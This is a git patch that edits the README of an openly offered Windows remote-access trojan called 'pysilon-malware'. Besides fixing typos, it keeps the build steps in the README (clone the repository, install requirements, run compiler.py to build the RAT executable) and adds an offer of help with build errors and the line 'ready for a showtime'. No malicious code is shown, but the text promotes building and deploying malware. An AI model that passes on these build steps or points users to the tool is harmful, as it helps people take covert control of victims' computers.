From 36269ceece61ea6fa717deccbebb48bfc42be59d Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Mateusz=20Go=C5=82embowski?=
<44233157+mategol@users.noreply.github.com>
Date: Fri, 2 Dec 2022 23:46:31 +0100
Subject: [PATCH] Update README.md
---
README.md | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/README.md b/README.md
index 23ce780d..a3d3179c 100644
--- a/README.md
+++ b/README.md
@@ -36,7 +36,7 @@
- update itself (ToDo)
# Preparation
-This malware is designed for Windows and because of some pip packages are available only on Windows, I'm afraid that you can't cmpile it on Linux (at least with compiler.py):
+This malware is designed for Windows and because of some pip packages are available only on Windows (maight be changed in future for Linux support), I'm afraid that you can't compile it on Linux (at least with compiler.py):
`git clone https://github.com/mategol/pysilon-malware`
`pip install -r requirements.txt`
`Follow the Setup instructions`
@@ -129,12 +129,12 @@ This malware is designed for Windows and because of some pip packages are availa
### `Run compiler.py and enter all needed values to successfully build RAT Windows executable.`
-
+if you encounter any errors, please raise an Issue and I will be happy to help.
-> **`Now, everything is set up for compiling the malware into Windows executable`**
+> **`Now, everything is ready for a showtime`**